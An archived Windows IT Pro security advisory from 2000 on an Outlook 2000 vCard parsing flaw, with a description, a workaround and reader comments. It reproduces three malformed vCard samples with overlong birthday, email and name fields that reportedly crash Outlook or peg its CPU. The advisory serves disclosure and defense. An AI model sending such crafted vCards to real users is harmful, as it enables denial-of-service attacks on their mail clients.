Windows IT Pro is the leading independent community for IT professionals deploying Microsoft Windows server and client applications and technologies.
  
  
  Advanced Search 


September 01, 2000

vCard Data Under Outlook 2000 Can Cause Denial of Service

A Web Exclusive from Windows IT Pro
Editors
Discoveries
InstantDoc #15499
Windows IT Pro
Email this Article
Printer Friendly
Reader Comments
Digg This
Del.icio.us
RSS
Subscribe to Windows IT Pro | See More Security Articles Here | Reprints | Or get the Monthly Online Pass—only $5.95 a month!



Reported August 30, 2000 by Joel Moses

VERSIONS AFFECTED
  • Microsoft Outlook 2000

DESCRIPTION

Outlook 2000 supports vCard technology, which helps to identify the sender of a given email. vCards are normally sent as file attachments to an email msg, where the vCard contains various fields and associated data. Data that exceeds 75 characters in length should be "line folded" (wrapper) to provide a uniform means of interpreting vCard data. RFC 2426 section 2.6 defines the means for line folding, however Microsoft's implementation does not follow the specification. Due to this oversite it is possible to cause Outlook 2000 to consume an unreasonably high amount of CPU time, or to completely crash. An attack could be launched by sending a vCard that contains long field data.

DEMONSTRATION

The following fields cause a buffer overflow:

email:
bday; value=date (as low as 52 characters of form YYYY-MM-D(60)

The following fields cause excessive CPU utilization:

name:
nickname:
fn:
title:
title;language=de;value=text:
tel:
tel;

The following examples were provided by the discoverer and are copied verbatim from the discoverer's original bulletin:

Examples
========

The following examples will cause the advertised behavior.

1) A modification of the "bday" field to extend beyond 55 characters.
This example appears to be the smallest amount of text required to
elicit the symptom. This example will cause Outlook 2000 to overflow
and terminate.

BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915130848273492749723947923749273942394792734972394729374927
4982739472937492873
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD

2) A modification of the "e-mail" field with a large amount of text
data masquerading as an e-mail address. This example will cause
Outlook 2000 to overflow and terminate.


BEGIN:VCARD
VERSION:2.1
N:Berger;Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de.sadsack.nothing.doing.is.an.overflo
.possible.sadsack.not hing.doing.is.an.overflow.possible.



.sadsack.nothing.doing.is.an.overflow.possible.com
REV:20000830T191121Z
END:VCARD

3) A modification of the "N" or "name" field with a large amount of
text will not cause Outlook to terminate, but will increase
Outlook's CPU utilization to 99%.

BEGIN:VCARD
VERSION:2.1
N:Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger Meister



Berger MeisterBerger MeisterBerger MeisterBerger MeisterBerger
MeisterBerger MeisterBerger MeisterBerger Meister
FN:Meister Berger
NICKNAME:Sadf
ORG:Test;e3425454
TITLE:Burgermeister
NOTE:The Mayor of the great city of Goerlitz in the great country of
Germany.
TEL;WORK;VOICE:(873) 323-3213
TEL;HOME;VOICE:(873) 323-3213
TEL;CELL;VOICE:(873) 323-3213
TEL;VOICE:+49 3581 1234
TEL;WORK;FAX:(873) 323-3213
ADR;WORK:;dsfaf;3423 efdsdfsd;4534534tertgerwtgr;TN;34564;United
States of America
LABEL;WORK;ENCODING=QUOTED-PRINTABLE:dsfaf=0D=0A3423
efdsdfsd=0D=0A4534534tertgerwtgr, TN 34564=0D=0AUnited State=
s of America
URL:
URL:http://bin.false/
ROLE:sadf
BDAY:19630915
EMAIL;PREF;INTERNET:mb@goerlitz.de
REV:20000830T191121Z
END:VCARD

VENDOR RESPONSE

Microsoft is aware of this problem, however no response was avauilable at the time of this writing.

To temporarily work around the problem to avoid viewing a vCard digitil ID, disassociate the "Digital ID File" from Outlook's Address Book by using the desktop Explorer. From the View pulldown menu choose Folder Options. When the dialog is displayed, select the File Types tab and scroll down to select the "Digital ID File" type. Before removing the file type be sure to record its associated command so that you can restore the file type at a later date when deemed appropriate. To record the command association, select Edit on the main dialog, and then select Edit again on the Edit File Type dialog. The command association will be displayed in the "Application used to perform action" field, where you may copy it for later redefinition.

CREDIT
Discovered by Joel Moses

End of Article

Reader Comments
Some additional information:

vCards are simply text files that use the .vcf file extension. If you want to chagne the file type association, look under file types for "vCard file" or, in Windows 2000, vcf file. If you change the association from Outlook to Notepad, you can open the vCard without crashing Outlook and then copy the data into an Outlook contact.

Sue Mosher September 01, 2000

Your Comments (required):How I get rid of the problem? Is it an EXE fiel that needs to be deleted? I deleted the contact name that caused the problem; but when I scroll down through my contact list, it still shuts Outlook down completely. What can I do?

Michelle Paul June 28, 2004

You must be a registered user or online subscriber to comment on this article. Please log on before posting a comment. Are you a new visitor? Register now




Top Viewed ArticlesView all articles
Battery Life Issues Almost Certainly Not Windows 7's Fault

While Microsoft is still investigating a notebook battery life issue that was supposedly caused by Windows 7, some interesting trends have emerged. ...

Getting your iPhone to Sync with Exchange 2003

Follow these steps to use an iPhone with Exchange. ...

Command Prompt Tricks

One reader shares his tip for setting up the command prompt to reflect a remote path. ...
Security Whitepapers Reducing the Costs and Risks of Branch Office Data Protection

Solving Desktop Management Challenges in Healthcare

Solving Desktop Management Challenges in Education
Related Events The Increasing Threat of Financially Motivated Data Theft

Top 5 Key Technologies Changing The Face of Exchange and Data Protection

Bail Out Your Exchange Environment

Check out our list of Free Email Newsletters!
Security eBooks Spam Fighting and Email Security for the 21st Century

Understanding and Leveraging Code Signing Technologies

A Guide to Windows Certification and Public Keys
Related Security Resources Introducing Left-Brain.com, the online IT bookstore
Looking for books, CDs, toolkits, eBooks? Prime your mind at Left-Brain.com

Discover Windows IT Pro eLearning Series!
Clear & detailed technical information and helpful how-to's, all in our trademark no-nonsense format


ADS BY GOOGLE

Job Openings in IT SPONSORED LINKS FEATURED LINKS
Collaborate with Confidence
Accelerate deployment and simplify Microsoft SharePoint management with EMC solutions and services.

Calculate your savings now
See how SAN is 57% cheaper than DAS over three years

Announcing Symantec Backup Exec 2010
With integrated deduplication and unified archiving technology.
Feb 25 - Are your IT Systems distributed? Or Convoluted?
Find out why integrated management solutions are more important than ever in today's IT environments and what criteria to consider when evaluating those solutions.

Virtualization Faceoff – Join the Discussion
Blogs, free poster, videos, community commentary – IT experts and peers face off on VMware & Microsoft virtualization solutions.

Should Your Email Live in the Cloud?
This Forrester report shows how-to calculate your on-premise email costs and compare with cloud-based alternatives and offers best practices for reducing email costs.

Exchange Server 2010: Deploying Unified Communications
register for this free virtual event and build your Unified Communications future on a strong Exchange Server 2010 foundation

New from Left-Brain.com - Manage VMware with PowerShell
Learn how to perform everything from simple ad-hoc reporting at the command-line to complex scripts that automate a massive deployment of hundreds of virtual machines.  Solve your old problems using less code than you thought possible!
Windows IT Pro Home Register FAQ for Windows WinInfo News
Europe Edition About Us Contact Us/Customer Service Media Kit Affiliates / Licensing  
SQL Server Magazine Office & SharePoint Pro DevProConnections IT Job Hound
Left-Brain.com Technology Resource Directory asp.netPRO ITTV Windows SuperSite 
 
 Windows IT Pro is a Division of Penton Media Inc.
 © 2010 Penton Media, Inc. Terms of Use | Privacy Statement